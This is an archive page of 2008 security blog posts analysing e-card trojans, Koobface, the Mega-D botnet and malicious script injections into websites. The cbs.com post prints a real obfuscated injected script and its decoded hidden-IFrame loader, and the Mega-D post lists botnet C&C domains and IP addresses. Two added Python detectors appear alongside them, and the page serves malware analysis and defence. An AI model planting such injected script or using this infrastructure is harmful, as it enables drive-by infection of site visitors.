Archive for 2008


Yet Another Malicious E-Card

By Rodel Mendrez  •  December 31st, 2008  •   Spam

It seems cybercriminals aren't taking holidays; in fact, this season is their favourite time to send out 'unwanted greetings'. We are receiving another 'e-card' spam attack that uses typical subject lines such as "An E-card from Steven", "You've got a Happy New Year Greeting Card", "Happy Christmas" or "Merry Christmas greetings for you" to lure users into opening these emails.

The link in the email body points to a website with a clickable image that leads to a backdoor trojan (an executable named "postcard.exe").

What does the trojan do on your computer once it is executed? Here are some of the things it does:

- It collects email addresses from your PC and sends 'e-card' spam to the harvested addresses.

- It forces Internet Explorer to lower its security settings so that the trojan has no trouble connecting to the internet.

- It may update itself or download arbitrary files.

- It connects to a list of IP addresses and opens a backdoor on your computer to which the trojan author can easily connect.

- It steals information such as the system configuration and IP addresses.

Fortunately, SpamCensor 292 blocks this type of spam message.


Even “Heroes” are not invincible

By Moshe Basanchig  •  December 31st, 2008  •   Cybercrime

Usually, when finding an infected web site, I treat it in a professionally strict manner; a thorough investigation is done, and when necessary, measures are taken.
As part of our ongoing research, I got to check the fan website of the famous TV show “Heroes” ;-) . I was very much disappointed to see that the site is infected with malicious code.
As you may recall, this isn’t the first time we at Finjan have found malicious code injected into legitimate and popular entertainment/TV related websites. Since these kinds of sites are popular among many viewers around the world, they pose appealing targets for cybercriminals. What makes this case different for me personally is the fact that I really like this show…
 
Following is my analysis of the attack. 
First, cybercriminals injected a SCRIPT tag into the exploited page: 

This script redirected the user to a malware server in China hosting obfuscated JavaScript code. Below is the code after it was de-obfuscated:
 
This code pushes a malicious PDF file to the client, which exploits the “CollectEmailInfo” vulnerability. Successful exploitation results in a Trojan being downloaded and executed on the victim’s machine. You can read more about PDF attacks in our Q4 trend report.
For our concerned readers and “Heroes” fans – as always, Finjan notified the website owners, and the malicious code was removed.
Wishing a safer Internet in 2009
Posted by Moshe Basanchig


Malicious E-Card Spam

By Gavin Neale  •  December 24th, 2008  •   Spam

Yesterday we started receiving ‘eCard’ spam emails all with the subject line ‘You have received an eCard’ and a link to a website.

The website in the link redirects the browser to a second website which is hosting obfuscated JavaScript. Just after the obfuscated section are a couple of lines of plain script:

The setTimeout function tells the browser to run the function ‘vparivatel’ in 60 seconds. This function will then redirect the browser to the page vparivatel.php on the same website. This then asks the user to download the file 1.exe.

Once we de-obfuscate the first section we get the following script:

This adds an element to the current page containing a PDF object. The PDF file loaded by this object attempts to exploit a vulnerability in Adobe Acrobat and Acrobat Reader. This vulnerability affects versions prior to 8.1.2. If the exploit is successful it downloads and executes the 1.exe file without requiring any interaction from the user.

The 1.exe file downloads and installs the rogue antivirus program Spyware Guard 2008. This program pretends to scan the system and falsely reports that the system is infected. In order to remove these ‘threats’ the user must pay for the full version. One clue for the user that this is not legitimate security software is the misspelling of 'security' in the tab on the left hand side.

Administrators should consider blocking access to mp3downloadsplus.com which is hosting the exploit and malware.


Social Networking Malware

By Rodel Mendrez  •  December 17th, 2008  •   Spam

Often, criminals use spam with a combination of social engineering tactics to propagate their malware. However, hackers are increasingly looking for newer, alternative ways to infect computers. Over the past few weeks, we have received reports of malware that exploits social networking sites like Facebook, Bebo, MySpace and Friendster as a more 'trendy' means of infection. This malware is known as Koobface.

If you are a fan of these social networking websites, chances are you have seen these types of messages:

A sample Koobface message in Facebook

A sample Koobface message in Friendster

If you click on one of these links, you will get redirected to a site that hosts the malware and encounter a fake 'video' claiming that you need to upgrade your Flash version.

In this case, the fake Flash installer downloads the Koobface bot (an executable file).

Like any other bot, Koobface connects to and receives instructions from its command and control (C&C) server. It detects when a user has logged on and has an active session with a social networking site, and sends this information to its C&C server. Koobface then uses that session to collect all of the user's friends. A spamming template is received from the C&C server and Koobface sends messages to all the friends it collected.

With millions of users hooked on these social networking sites, it is unsurprising how successful Koobface has been at infecting users in this way.

For more detailed information on Koobface, ThreatExpert has an excellent analysis of this malware.


A closer look at Mega-D

By Rodel Mendrez  •  December 11th, 2008  •   Spam

In a previous blog post, we talked about the return of the Mega-D botnet (a.k.a. Ozdok) in the wake of the McColo shutdown; it is one of the major botnets responsible for sending close to 50% of all spam. This time we thought we would take a closer look at this bot.

Mega-D has a unique way of hiding itself from detection. It tries to fool users by creating a new process of svchost.exe (a legitimate Windows component) and injecting its code into that process.

After creating a fake but legitimate-looking Windows process, Mega-D copies itself into the Windows system directory as an Alternate Data Stream (ADS) using the filename “svchost.exe:ext.exe”. This is a clever method of hiding malicious files from detection, since neither Windows Explorer nor cmd.exe reveals ADS streams unless a special tool such as Streams from Sysinternals is used.

Mega-D then creates a service so that the dropped file auto-executes on system startup. “FCI” is the display name for this specific Mega-D sample (md5 hash: EB6C85A3D3A17CDC4DC50CF018322A59, packed using UPX).

It looks like this in the Services management console once registered:

After Mega-D transfers control to the injected code, it terminates and deletes the executed malware to further reduce its footprint and the likelihood of detection. From the injected code, Mega-D performs a DNS query on one of the following domains:

  • mazerattikrak.info
  • host.violenzarja.biz
  • m.violenzarja.biz
  • pilimerkazana.biz
  • jopiterazania.net
  • upoyansa.com
  • hotopikalar.info
  • fhkacwd9aalg.info
  • beztakrezt.info

Once the DNS query succeeds, Mega-D sends a test message.

Here is a sample SMTP transaction when Mega-D sends a test message:

Older samples try to connect to majzufaiuq.info, which is currently an unregistered domain. The bot then attempts to connect to its C&C server; we observed Mega-D connecting to the following addresses on port 80:

  • 72.21.32.138
  • 98.126.40.74
  • 216.32.90.186

It was also observed that it downloaded an updated binary from 98.126.40.74:80 / mss32.exe (please note: link was intentionally broken).

The message body is usually in HTML format only, with themes focused on fake designer products, male enlargement, sexual enhancement and current news topics, and uses NDR-style subject lines such as:

Delivery Status Notification
Delivery Status Notification (Failure)
RE: Message
RE: Order Status

Here's a sample spam from Mega-D:

In summary, the Mega-D malware uses sophisticated methods to stay stealthy. It is difficult even for experienced users to identify without specialized analysis tools. It is designed to be flexible when attempting connections to its Command and Control servers and uses a range of methods to update itself. It is a very professionally written piece of malware.


Google Notebook Spam

By Gavin Neale  •  December 10th, 2008  •   Spam

Spammers are using Google Notebook to host links to the web sites their spam is trying to promote. Google Notebook is a service that allows users to collect clips of information as they browse the web and paste it into their notebook. Notebooks can be made public so others can view them. The spammers are creating notebooks with the spam content and then spamming out links to the notebook.

Because the links in the spam emails are to a legitimate domain, URL filtering is less likely to block the email and users are going to be less suspicious about clicking on the link. The link in the above email goes to the notebook page below.

Clicking on the ‘ENTER HERE >>’ link in the notebook takes the user to a page advertising various adult websites.

Spammers have previously used the same technique with Blogspot and Windows Live Spaces used to host spam content. This is yet another example of spammers abusing free services to achieve their goals. It is important that providers such as Google and Microsoft monitor the public content that they are hosting to prevent their services from harming other internet users.


Return of the Mega-D

By Phil Hay  •  December 5th, 2008  •   Spam

Following the McColo network takedown, spam volume has been clawing its way back up. Our daily Spam Volume Index (SVI) – which measures the volume of spam arriving to a bundle of domains we monitor – has doubled since the low point immediately after the McColo shutdown on 11 November.

Initially we saw some revived activity from Rustock, which now appears to have gone quiet. On the other hand, Mega-D has bounced back and is now spamming heavily. Mega-D (a.k.a. Ozdok) now has an updated spambot which no longer uses its former distinctive hard-coded template. Yesterday, spam from Mega-D made up some 48% of the spam arriving at our spam traps. It is now using this style of header:

To: <lka@xxx.com>
Subject: Your order
From: <lka@xxx.com>
MIME-Version: 1.0
Importance: High
Content-Type: text/html

Interestingly, this is the exact same header template we saw Rustock use just prior to the McColo takedown – reinforcing the idea that the same group is behind both botnets. Of course, the other possibility is that there is a good deal of mimicking going on.

Note that the header uses the same From: and To: address. While not a new trick, this has been causing some problems to people who have whitelisted their own entire domains. In short, avoid doing this. If you are a MailMarshal customer, check out the anti-spoofing feature.
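As an added example (not code from the original posts), the following Python script implements the gateway-side checks a defender can derive from the header template above and from the fake-NDR subject lines listed in the "A closer look at Mega-D" post: flagging self-addressed mail (identical From: and To:), the HTML-only "Importance: High" template, and NDR-style subjects that do not come from a bounce address. The sample messages are constructed here with placeholder addresses; a self-addressed message is flagged before any domain whitelist is consulted, which is the point of the advice not to whitelist your own domain.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample reproducing the header template shown in the post
# (placeholder addresses, not real ones).
SAMPLE_MEGAD = """To: <lka@example.com>
Subject: Your order
From: <lka@example.com>
MIME-Version: 1.0
Importance: High
Content-Type: text/html

<html><body>your order</body></html>
"""

# Constructed ordinary message that should raise no finding.
SAMPLE_LEGIT = """To: <alice@example.com>
Subject: Re: lunch
From: <bob@example.org>
MIME-Version: 1.0
Content-Type: text/plain

see you at noon
"""

# Constructed message using one of the fake-NDR subjects from the earlier post.
SAMPLE_FAKE_NDR = """To: <carol@example.com>
Subject: Delivery Status Notification (Failure)
From: <promo@example.net>
MIME-Version: 1.0
Content-Type: text/html

<html><body>click</body></html>
"""

# NDR-style subject lines listed in "A closer look at Mega-D" (compared case-insensitively).
NDR_SUBJECTS = {
    "delivery status notification",
    "delivery status notification (failure)",
    "re: message",
    "re: order status",
}

# Senders that legitimately produce bounce messages.
BOUNCE_PREFIXES = ("mailer-daemon@", "postmaster@")


def analyze(raw: str) -> list[str]:
    """Return a list of findings for one RFC 822 message given as text."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    sender = parseaddr(msg.get("From", ""))[1].lower()
    recipient = parseaddr(msg.get("To", ""))[1].lower()
    subject = (msg.get("Subject") or "").strip().lower()
    importance = (msg.get("Importance") or "").strip().lower()

    # Self-spoofing: a message that claims to be from its own recipient.
    if sender and sender == recipient:
        findings.append("self-addressed: From and To are identical")

    # Single-part HTML body marked high importance, as in the template.
    if not msg.is_multipart() and msg.get_content_type() == "text/html" and importance == "high":
        findings.append("html-only body with Importance: High")

    # Bounce-looking subject from an address that is not a bounce generator.
    if subject in NDR_SUBJECTS and not sender.startswith(BOUNCE_PREFIXES):
        findings.append("NDR-style subject from a non-bounce sender")

    return findings


if __name__ == "__main__":
    for name, sample in [("megad", SAMPLE_MEGAD), ("legit", SAMPLE_LEGIT), ("fake-ndr", SAMPLE_FAKE_NDR)]:
        print(name, analyze(sample))
```

The self-addressed check runs on the parsed address, not on the display name, so a whitelist keyed on the sending domain would still pass the message; run this kind of check ahead of any domain whitelist.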

Thanks to the research team at FireEye for supplying us with an updated Mega-D sample.


CBS.COM was compromised

By Moshe Basanchig  •  November 27th, 2008  •   Cybercrime

Today Finjan’s MCRC has revealed that the famous radio and television network, CBS, was compromised as a result of malicious activity. 
According to Alexa.com the Cbs.com website has a traffic rank of 964.
 
The cybercriminals added a malicious obfuscated script to the infected page. The injected script adds a malicious IFrame to the page.

Obfuscated script injected on cbs.com sub-domain 
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. The remote Russian server is already down. 
The obfuscated code as it appears on cbs.com sub-domain in the source: 

<script type="text/javascript">
function v4818cf77547e5(v4818cf7754fde){ function v4818cf77557d4 () {return 16;}
return(parseInt(v4818cf7754fde,v4818cf77557d4()));}function v4818cf77563de(v4818cf77567c7)
{ function v4818cf77577b8 () {var v4818cf7757faf=2; return v4818cf7757faf;}
var v4818cf7756bc2='';for([REMOVED] { v4818cf7756bc2+=(String.fromCharCode(v4818cf77547e5(v4818cf77567c7.substr(v4818cf7756fbe,
v4818cf77577b8()))));}return v4818cf7756bc2;} document.all('yby').value=(v4818cf77563de
('3C5343524950543E77696E[REMOVED]3D363332206865696768743D343037207374796
[REMOVED]543E'));
</script>

The de-obfuscated script: 

<script type="text/javascript">
window.status='Done'; document.write('<iframe name=29dee5c6 src=\'http://[REMOVED]/.if/go.html?' +Math.round(Math.random()*257224)+'3e78\' width=632 height=407 style=\'display: none\'></iframe>')
</script>
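The decoder in the injected script is simple: it walks the hex string two characters at a time, converts each pair with parseInt(pair, 16) and appends String.fromCharCode of the result. As an added example (not Finjan's code), the Python below reproduces that decoder, pulls hex literals out of a script, and checks the decoded output for an IFrame styled display:none, which is the indicator an analyst would look for. The obfuscated script and its payload are constructed here with a placeholder host; the one value taken from the page is the visible prefix of the real hex literal, 3C5343524950543E77696E, which decodes to "<SCRIPT>win", consistent with the window.status call in the de-obfuscated script.

```python
import re

# Constructed clear-text payload in the same shape as the de-obfuscated cbs.com
# script (placeholder host, not the real server).
PAYLOAD_CLEAR = (
    "<SCRIPT>window.status='Done';document.write('<iframe name=29dee5c6 "
    "src=\"http://malicious.invalid/.if/go.html?3e78\" width=632 height=407 "
    "style=\"display: none\"></iframe>')</SCRIPT>"
)
PAYLOAD_HEX = PAYLOAD_CLEAR.encode("ascii").hex().upper()

# Constructed obfuscated wrapper using the same parseInt/fromCharCode loop.
OBFUSCATED_SCRIPT = (
    "function v1(s){return parseInt(s,16);}"
    "function v2(h){var o='';for(var i=0;i<h.length;i+=2)"
    "{o+=String.fromCharCode(v1(h.substr(i,2)));}return o;}"
    "document.all('yby').value=(v2('" + PAYLOAD_HEX + "'));"
)

HEX_LITERAL = re.compile(r"'([0-9A-Fa-f]{16,})'")      # long quoted hex runs
IFRAME_TAG = re.compile(r"<iframe[^>]*>", re.IGNORECASE)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none", re.IGNORECASE)
SRC_ATTR = re.compile(r"src=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def decode_hex_pairs(hexstr: str) -> str:
    """Mirror the script's loop: each 2-char chunk -> parseInt(chunk, 16) -> character."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex literal")
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def extract_hex_literals(script: str) -> list[str]:
    """Find single-quoted hex strings long enough to be an encoded payload."""
    return HEX_LITERAL.findall(script)


def find_hidden_iframes(html: str) -> list[str]:
    """Return the src of every iframe whose tag carries display:none."""
    hidden = []
    for match in IFRAME_TAG.finditer(html):
        tag = match.group(0)
        if HIDDEN_STYLE.search(tag):
            src = SRC_ATTR.search(tag)
            hidden.append(src.group(1) if src else "")
    return hidden


def analyze_script(script: str) -> dict:
    """Decode every hex literal in the script and report hidden iframes found in the output."""
    decoded = [decode_hex_pairs(h) for h in extract_hex_literals(script)]
    hidden = [src for text in decoded for src in find_hidden_iframes(text)]
    return {"decoded": decoded, "hidden_iframes": hidden}


if __name__ == "__main__":
    print(decode_hex_pairs("3C5343524950543E77696E"))   # prefix taken from the page
    print(analyze_script(OBFUSCATED_SCRIPT)["hidden_iframes"])
```

The regexes deliberately match on the decoded text rather than on the obfuscated wrapper, since the variable names in the wrapper change from injection to injection while the hidden-IFrame pattern in the output does not.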

The malicious Russian server, from which the IFrame pulled the malicious code: 
 
As always, the MCRC team immediately informed CBS.com of the infection. 
This case shows us once again that infecting legitimate websites with malicious obfuscated code remains a favorite and highly effective attack vector for hackers! 
We have not seen the last of it yet…
Posted by Moshe Basanchig


Botnets show signs of life

By Phil Hay  •  November 26th, 2008  •   Spam

It was perhaps inevitable. After some two weeks in the wilderness, most of the spam botnets that were affected by the shutdown of McColo two weeks ago have begun to show signs of life.

Yesterday we saw both Mega-D and Rustock begin to spam again. Mega-D had a brief spurt but has since stopped. On the other hand, Rustock returned in force yesterday and is spamming in relatively large volumes, mainly with links to Canadian Pharmacy websites. Gheg, a smaller botnet that was also using McColo to host its control servers, is also spamming again.

We have also seen a small volume of spam trickling in from Srizbi over the last several days, which may have originated from bots that used a control server not hosted by McColo. Despite reports elsewhere to the contrary, we have yet to see Srizbi spam in a significant way. Recent evidence suggests that the operators of Srizbi may have relocated their servers and regained control. If so, we may yet see increased spam volumes from this beast in the near future.

Spam volumes, as you can see in our Daily Spam Volume Index below, are still way below what they were before McColo was taken offline. However over the last two days the volume has increased noticeably, which is almost single-handedly due to the return of Rustock.


Spam remains down

By Phil Hay  •  November 19th, 2008  •   Spam

After last week's sudden shutdown of the McColo network, which hosted a number of botnet command and control servers, spam remains way down, as you can see reflected in the Spam Volume Index from our spam statistics page:

The Srizbi, Rustock and Mega-D botnets have ground to a halt, again reflected in their downward trends in our Spam by Spambot graph below. Note: the graph contains last week's complete data and incorporates Srizbi, Rustock and Mega-D spam from earlier in the week when McColo was still up. Next week, assuming the current situation stays the same, the lines will plummet further. As these botnets have dropped away, other botnets have proportionally risen in the mix, notably Pushdo, Bobax and Grum.

The impact of Srizbi dropping out is huge. The folks at FireEye recently produced data suggesting the number of Srizbi bots is at least 450,000. In our labs, we have seen individual Srizbi bots send up to 24,000 spam messages per hour. Any way you do the math, you get a big number. Conservatively, we think Srizbi, when it was going, was capable of some 60-80 billion spams per day. As you can see in the above graph Srizbi was responsible for 30-50% of spam that we track.

Despite the victory last week, we expect the botnets to bounce back in some form. Earlier in the year we saw Mega-D recover from a 'busted' control server which saw it out of action for 10 days. Srizbi too, could recover. There are signs that Srizbi's fallback mechanism may be cleverer than we first thought.

Over the longer term, the botnet operators will learn from this incident and probably evolve their control systems. They may adopt a more resilient peer-to-peer or layered model where control servers are harder to access and spread among many hosts. However it develops, the key challenge for all in the security community is to keep exposing and maintaining the pressure on these botnets. As last week's events show, it can have a positive impact on spam.